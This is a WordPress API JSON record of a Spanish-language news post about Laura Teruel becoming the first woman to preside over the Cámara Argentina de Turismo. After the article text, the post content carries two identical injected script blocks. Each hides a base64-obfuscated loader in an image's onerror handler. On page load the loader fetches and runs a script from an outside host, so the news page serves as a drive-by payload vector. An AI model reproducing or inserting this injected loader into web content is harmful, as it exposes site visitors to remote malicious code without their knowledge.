{"id":5265,"date":"2025-06-18T12:22:40","date_gmt":"2025-06-18T15:22:40","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5265"},"modified":"2025-08-13T23:29:34","modified_gmt":"2025-08-14T02:29:34","slug":"laura-teruel-nueva-presidenta-de-la-cat-primera-mujer-en-liderar-la-entidad","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5265","title":{"rendered":"Laura Teruel, nueva presidenta de la CAT: primera mujer en liderar la entidad"},"content":{"rendered":"\n<p><em><strong>Con una trayectoria reconocida en el \u00e1mbito empresario, Laura Teruel fue electa como presidente de la C\u00e1mara Argentina de Turismo. Ejercer\u00e1 funciones hasta 2027.<\/strong><\/em><\/p>\n\n\n\n<p>En una jornada clave para el sector tur\u00edstico nacional, la C\u00e1mara Argentina de Turismo (CAT) organiz\u00f3 su Asamblea General Ordinaria, acto en el que renov\u00f3 sus autoridades y design\u00f3 como presidente a Laura Teruel, quien se convierte en la primera mujer en liderar la instituci\u00f3n desde su creaci\u00f3n.<\/p>\n\n\n\n<p>La dirigente asume el desaf\u00edo de conducir la CAT durante el per\u00edodo 2025-2027, sucediendo a Gustavo Hani, con el acompa\u00f1amiento de Daniel Suffredini -en representaci\u00f3n de FEHGRA-, y el respaldo fundamental de entidades como la Federaci\u00f3n, entre otras. Muchas entidades miembros de FEHGRA participaron de la Asamblea en calidad de Socios Institucionales.<\/p>\n\n\n\n<p>Su gesti\u00f3n apuesta al fortalecimiento del v\u00ednculo p\u00fablico-privado; al posicionamiento de Argentina como un destino competitivo, por la calidad de sus servicios y su capacidad de innovaci\u00f3n; y a la representaci\u00f3n diversa y federal, en l\u00ednea con los desaf\u00edos actuales del turismo argentino.<\/p>\n\n\n\n<p>Al finalizar la jornada el secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n, Daniel Scioli, mantuvo un encuentro con la nueva presidenta de la CAT, Laura Teruel, en la que tambi\u00e9n particip\u00f3 el ex presidente de la entidad, Gustavo Hani.<\/p>\n\n\n\n<p><em>En la foto, de izquierda a derecha, Gustavo Hani, Fernando Desbots, Laura Teruel y Daniel Suffredini.<\/em><\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/fehgra.org.ar\/wp-content\/uploads\/2023\/06\/logo-para-header-www.svg\" alt=\"\" style=\"width:212px;height:auto\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con una trayectoria reconocida en el \u00e1mbito empresario, Laura Teruel fue electa como presidente de la C\u00e1mara Argentina de Turismo. Ejercer\u00e1 funciones hasta 2027. En una jornada clave para el sector tur\u00edstico nacional, la C\u00e1mara Argentina de Turismo (CAT) organiz\u00f3 su Asamblea General Ordinaria, acto en el que renov\u00f3 sus autoridades y design\u00f3 como presidente [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5266,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-5265","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5265"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5265"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5265\/revisions"}],"predecessor-version":[{"id":6459,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5265\/revisions\/6459"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5266"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5265"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5265"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5265"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}